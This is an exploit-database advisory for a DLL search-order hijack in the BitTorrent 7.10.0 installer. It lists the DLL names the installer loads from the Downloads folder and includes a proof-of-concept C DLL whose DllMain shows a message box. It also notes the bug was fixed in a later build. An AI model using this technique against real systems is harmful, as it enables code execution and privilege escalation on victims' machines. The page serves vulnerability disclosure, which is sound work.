Bittorrent 7.10.0 (Build 43581) Installer DLL Hijacking



EKU-ID: 6818 CVE: OSVDB-ID:
Author: Rithwik Jayasimha Published: 2017-08-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Bittorrent 7.10.0 (Build 43581) Installer DLL Search Order Hijack - "WININET.dll", "DNSAPI.dll", others
# Date of Discovery: July 21 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Bittorrent Inc.
# Vendor Homepage: https://www.bittorrent.com
# Software Link: http://download-new.utorrent.com/endpoint/bittorrent/os/windows/track/stable/
# Affected Versions: <=7.10.0.43581
# Tested on: Windows 10, 8.1 x64
# Category: local
# Vulnerability type: Local Privilege Escalation/Code Execution


# Description:


	Bittorrent versions <=7.10.0 Build 43581 automatically search for "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll", "bcrypt.dll" and "PHLPAPI.dll"
	among others from the installer download location.
	This allows a malicious attacker to potentially create these files in the directory resulting in them being run on installer execution.
	(code execution, local privilege escalation)
			C:\Users\<username>\Downloads\WININET.dll
			C:\Users\<username>\Downloads\msls31.dll
			C:\Users\<username>\Downloads\USP10.dll
			C:\Users\<username>\Downloads\CRYPTSP.dll
			C:\Users\<username>\Downloads\bcrypt.dll
			C:\Users\<username>\Downloads\PHLPAPI.dll


# Proof Of Concept:
	1. Compile, place in vulnerable location and run bittorrent.exe

		#include <windows.h>
		#define DllExport __declspec (dllexport)
		BOOL WINAPI  DllMain (
		            HANDLE    hinstDLL,
		            DWORD     fdwReason,
		            LPVOID    lpvReserved)
		{
		  dll_hijack();
		  return 0;
		}
		int dll_hijack()
		{
		  MessageBox(0, "Bittorrent 7.10.0.43581 DLL Hijacking PoC", "DLL Message", MB_OK);
		  return 0;
		}

# Additional Notes, References and links:

# Disclosure Timeline:
    This issue was remedied in BitTorrent 7.10.0 For Windows (build 43917)